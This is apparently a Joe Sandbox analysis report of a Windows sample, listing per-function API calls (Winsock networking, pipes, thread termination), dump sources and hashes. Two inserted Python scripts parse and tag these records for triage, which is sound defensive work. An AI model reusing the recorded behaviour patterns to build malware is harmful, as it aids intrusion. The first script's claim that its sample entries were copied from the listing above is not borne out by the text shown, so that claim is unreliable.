                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00A2397C
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A2398D
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A239A7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                                                                                                  • Opcode ID: 13c465dd9c3fb130cf74ca287f0761403dba9def69bf7f1a99059035e07a3077
                                                                                                                                                                                                                                  • Instruction ID: 2ffef8bc585933ad801706a9374ca1541f12e771c67fe410f59d63cf9d65e2ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13c465dd9c3fb130cf74ca287f0761403dba9def69bf7f1a99059035e07a3077
• Instruction Fuzzy Hash: D3310532604265AFDB21CF9CEC95F6437A1EB87710F1501B4F5149B2B2CBB9A986DB01
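The "APIs" entries above are easier to triage when parsed into records and read with SDK constant names: the socket function creates an AF_INET/SOCK_STREAM/IPPROTO_TCP socket (the shape of a C2 connect routine), and the USER32 function drives checkbox controls with BM_GETCHECK/BM_SETCHECK. The following script is an added example, not part of the Joe Sandbox report or its tooling; the line regular expression, the constant tables and the inline SAMPLE excerpt (hand-copied from the listing above) are the example's own assumptions about the report format.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed excerpt mirroring the "APIs" entries of the socket and
# SendMessageW functions listed above (assumed format, copied by hand).
SAMPLE = """
APIs
  • Part of subcall function 00A13AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A13AD7
  • Part of subcall function 00A13AAB: _wcslen.LIBCMT ref: 00A13AF8
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A11B6F
• WSAGetLastError.WSOCK32 ref: 00A11B7E
• closesocket.WSOCK32(00000000), ref: 00A11C56
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00A238B8
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00A2397C
"""

# One API line: optional "Part of subcall function XXXX:" prefix, then
# api.MODULE, an optional "(args)" list, then "ref: ADDRESS".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]      # recovered hex values; None where the report shows '?'
    ref: int                       # address of the call site
    caller: Optional[int] = None   # set when the call sits inside a subcall


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    if not text or not text.strip():
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in text.split(",")]


def parse_listing(text: str) -> List[ApiRef]:
    """Parse every API line; headers such as 'APIs' are skipped."""
    refs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        refs.append(ApiRef(
            api=m["api"],
            module=m["module"].upper(),
            args=parse_args(m["args"]),
            ref=int(m["ref"], 16),
            caller=int(m["caller"], 16) if m["caller"] else None,
        ))
    return refs


# Winsock and button-control constants as defined in the Windows SDK headers.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
BUTTON_MSG = {0xF0: "BM_GETCHECK", 0xF1: "BM_SETCHECK", 0xF2: "BM_GETSTATE"}
CHECK_STATE = {0: "BST_UNCHECKED", 1: "BST_CHECKED", 2: "BST_INDETERMINATE"}


def name(table: dict, value: Optional[int]) -> str:
    if value is None:
        return "?"
    return table.get(value, hex(value))


def describe(ref: ApiRef) -> str:
    """Render the arguments the report recovered using SDK constant names."""
    if ref.api == "socket" and len(ref.args) >= 3:
        af, ty, pr = ref.args[:3]
        return f"socket({name(AF, af)}, {name(SOCK_TYPE, ty)}, {name(PROTO, pr)})"
    if ref.api.startswith("SendMessage") and len(ref.args) >= 2:
        label = name(BUTTON_MSG, ref.args[1])
        if label == "BM_SETCHECK" and len(ref.args) > 2 and ref.args[2] is not None:
            label += " " + name(CHECK_STATE, ref.args[2])
        return f"{ref.api}(hwnd, {label})"
    return f"{ref.api}.{ref.module}"


def tcp_socket_sites(refs: List[ApiRef]) -> List[int]:
    """Call sites that create an AF_INET/SOCK_STREAM/IPPROTO_TCP socket."""
    return [r.ref for r in refs if r.api == "socket" and r.args[:3] == [2, 1, 6]]


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for r in parsed:
        where = f"{r.ref:08X}" + (f" (via {r.caller:08X})" if r.caller else "")
        print(f"{where}: {describe(r)}")
    print("TCP socket creation at:", [f"{a:08X}" for a in tcp_socket_sites(parsed)])
```

Arguments the report could not recover stay as None rather than being guessed, so a socket() whose family is '?' is not counted as a TCP connect site; extend the constant tables for whatever other APIs a given listing contains.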
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F80D0
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F80F6
• SysAllocString.OLEAUT32(00000000), ref: 009F80F9
• SysAllocString.OLEAUT32(?), ref: 009F8117
• SysFreeString.OLEAUT32(?), ref: 009F8120
• StringFromGUID2.OLE32(?,?,00000028), ref: 009F8145
• SysAllocString.OLEAUT32(?), ref: 009F8153
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: a43813579ea89caf313cd9aaf333edb408f2246c340aecb0a6970fbce259678b
• Instruction ID: f49915af2c6774745b3abc03389b9c0616bdcd37e191f8b213c3e6d9835125de
• Opcode Fuzzy Hash: a43813579ea89caf313cd9aaf333edb408f2246c340aecb0a6970fbce259678b
• Instruction Fuzzy Hash: 0121957260421DAF9F60EFA8CC84DBB77ACEB093647048525FA05DB291DB74EC478760
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F81A9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F81CF
• SysAllocString.OLEAUT32(00000000), ref: 009F81D2
• SysAllocString.OLEAUT32 ref: 009F81F3
• SysFreeString.OLEAUT32 ref: 009F81FC
• StringFromGUID2.OLE32(?,?,00000028), ref: 009F8216
• SysAllocString.OLEAUT32(?), ref: 009F8224
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00A00E99
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A00ED5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00A00F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A00FA8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
  • Part of subcall function 00997873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009978B1
  • Part of subcall function 00997873: GetStockObject.GDI32(00000011), ref: 009978C5
  • Part of subcall function 00997873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009978CF
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A24BB0
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A24BBD
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A24BC8
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A24BD7
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A24BE3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
  • Part of subcall function 009CDB23: _free.LIBCMT ref: 009CDB4C
• _free.LIBCMT ref: 009CDBAD
  • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
  • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
• _free.LIBCMT ref: 009CDBB8
• _free.LIBCMT ref: 009CDBC3
• _free.LIBCMT ref: 009CDC17
• _free.LIBCMT ref: 009CDC22
• _free.LIBCMT ref: 009CDC2D
• _free.LIBCMT ref: 009CDC38
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                  • Instruction ID: b9ffce512481ae1a848e99e809b67df36aa5a3677dc1a44c1c8e37692f8769ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11115172D42B04BAD624BBB0DC07FCB77EC9F95700F410C2DB29AAA193DA75F9448652
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009FE328
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009FE32F
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009FE345
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009FE34C
                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009FE390
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 009FE36D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                  • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                  • Opcode ID: c000e6f2dba945375a5f6a71ac0d4c46e38baf97d83611e37661e8eb45775448
                                                                                                                                                                                                                                  • Instruction ID: 6fd8c12adb4a16f07fda215119a03466958b9aed1f0d578aa5d2b6007c285825
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c000e6f2dba945375a5f6a71ac0d4c46e38baf97d83611e37661e8eb45775448
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B0136F690021C7FE721D7E89D89EFB776CE708301F0045A1B74AE6052E6749E864B75
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00A01322
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?), ref: 00A01334
                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A01342
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A01350
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A0135F
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A0136F
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000), ref: 00A01376
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                                                                                  • Opcode ID: 5ce296d83d8b2339260c7f6f7c5926d070a1e3f79aa841639ec6cd6775804f5e
                                                                                                                                                                                                                                  • Instruction ID: 16e9387db8db5edd9847c92256bf04ef65ddb97747cbb8c987e539a0c17d85df
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ce296d83d8b2339260c7f6f7c5926d070a1e3f79aa841639ec6cd6775804f5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63F0EC32042612FBD7619B98EE89BE6BB39FF04302F402131F201958A187749473CFD1
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A1281D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A1283E (import by ordinal; wsock32.dll exports recvfrom at ordinal 17)
• WSAGetLastError.WSOCK32 ref: 00A1284F
• htons.WSOCK32(?,?,?,?,?), ref: 00A12938
• inet_ntoa.WSOCK32(?), ref: 00A128E9
  • Part of subcall function 009F433E: _strlen.LIBCMT ref: 009F4348
  • Part of subcall function 00A13C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A0F669), ref: 00A13C9D
• _strlen.LIBCMT ref: 00A12992
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
• Opcode ID: 81679eacca3a08b67c2c4dd172e35779527ab3df715dd0e2b0898081b02f9a8e
• Instruction ID: edd6331147582fa2bdf3bb6ca3796794c276abc7153d443dc51e316536951fc4
• Opcode Fuzzy Hash: 81679eacca3a08b67c2c4dd172e35779527ab3df715dd0e2b0898081b02f9a8e
• Instruction Fuzzy Hash: 75B10375604300AFD724DF28C885F6ABBE5AF84318F54855CF49A4B2E2DB31ED86CB91
APIs
• __allrem.LIBCMT ref: 009C042A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C0446
• __allrem.LIBCMT ref: 009C045D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C047B
• __allrem.LIBCMT ref: 009C0492
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C04B0
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction ID: bf57cc220148c3718f19be557e1716e91d999e1b7ea9a4c42570a2439d6cb7fa
• Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction Fuzzy Hash: B781F671E0070ADBE724AF69CC82F6BB3A8AFD4764F24452EF511D6691E770D9008752
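The blocks above are the per-function records Joe Sandbox emits for each disassembled function: the API calls with their stack arguments and call-site address, referenced strings, the memory dump region the code was recovered from, and the similarity hashes. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses that layout into records, strips the "Download File" link text that the page glues onto dump names, resolves ordinal-only imports such as #17.WSOCK32 (wsock32.dll exports recvfrom at ordinal 17), and assigns coarse behaviour tags from the direct calls. The sample input is constructed from two of the blocks on this page; the record fields, regular expressions and tag names are this example's own choices, not anything the report defines.

```python
"""Parse Joe Sandbox per-function blocks into records and tag them (added example)."""
import re

# Constructed sample in the report's own layout, assembled from two function blocks on this page.
SAMPLE = """\
APIs
• LoadStringW.USER32(00000000), ref: 009FE32F
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 009FE390
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 009FE36D
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
Similarity
• API ID: HandleLoadModuleString$Message
• Instruction Fuzzy Hash: 0B0136F690021C7FE721D7E89D89EFB776CE708301F0045A1B74AE6052E6749E864B75
APIs
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A1283E
• WSAGetLastError.WSOCK32 ref: 00A1284F
  • Part of subcall function 009F433E: _strlen.LIBCMT ref: 009F4348
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
"""

HEADINGS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# Export ordinals shared by wsock32.dll and ws2_32.dll; a nameless import prints as "#<ordinal>.<MODULE>".
WSOCK_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 9: "htons", 12: "inet_ntoa",
                  13: "listen", 16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto", 23: "socket"}
API_RE = re.compile(r"^(?P<name>[^.(]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")


def new_record():
    return {"apis": [], "strings": [], "source_file": "", "associated": [], "similarity": {}}


def parse_api(item):
    """Split one API bullet into name/module/args/ref; resolve wsock ordinal imports."""
    subcall = None
    m = SUBCALL_RE.match(item)
    if m:
        subcall, item = m.group("fn"), m.group("rest")
    m = API_RE.match(item)
    if not m:
        raise ValueError(f"unrecognised API line: {item!r}")
    name, module = m.group("name"), m.group("module")
    resolved = name
    if name.startswith("#") and module.upper() in ("WSOCK32", "WS2_32"):
        resolved = WSOCK_ORDINALS.get(int(name[1:]), name)
    args = [a for a in (m.group("args") or "").split(",") if a]
    return {"name": name, "resolved": resolved, "module": module,
            "args": args, "ref": m.group("ref"), "subcall_of": subcall}


def parse_report(text):
    """Return one record per APIs/Strings ... Similarity block, in report order."""
    records, current, section = [], None, None
    for line in filter(None, map(str.strip, text.splitlines())):
        if line in HEADINGS:
            # A block opens at APIs or Strings; the next one starts only after Similarity was seen.
            if line in ("APIs", "Strings") and (current is None or current["similarity"]):
                current = new_record()
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            current["apis"].append(parse_api(item))
        elif section == "Strings":
            value, sep, xref = item.rpartition(", xrefs: ")
            current["strings"].append({"value": value if sep else item, "xref": xref if sep else ""})
        elif section == "Memory Dump Source":
            key, _, value = item.partition(": ")
            value = value.removesuffix("Download File")  # link text the page glues onto the dump name
            if key == "Source File":
                current["source_file"] = value.split(",")[0]
            elif key == "Associated":
                current["associated"].append(value)
        elif section == "Similarity":
            key, _, value = item.partition(":")
            current["similarity"][key] = value.strip()
    return records


def tag_record(rec):
    """Coarse behaviour tags from the direct (non-subcall) API calls; tag names are this example's."""
    direct = [a for a in rec["apis"] if a["subcall_of"] is None]
    names = {a["resolved"] for a in direct}
    tags = set()
    if {a["module"].upper() for a in direct} & {"WSOCK32", "WS2_32", "WININET", "WINHTTP"}:
        tags.add("network")
    if "TerminateThread" in names:
        tags.add("thread-kill")
    if names & {"MessageBoxA", "MessageBoxW"}:
        tags.add("dialog")
    return tags
```

Run parse_report over a saved text copy of the report to index functions by Instruction Fuzzy Hash or to list every function whose direct calls land in WSOCK32 when looking for the network-handling code. Subcall entries are kept on the record but excluded from tagging, since they describe callees rather than the function itself.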
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009B8649,009B8649,?,?,?,009C67C2,00000001,00000001,8BE85006), ref: 009C65CB
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009C67C2,00000001,00000001,8BE85006,?,?,?), ref: 009C6651
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009C674B
• __freea.LIBCMT ref: 009C6758
  • Part of subcall function 009C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
• __freea.LIBCMT ref: 009C6761
• __freea.LIBCMT ref: 009C6786
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
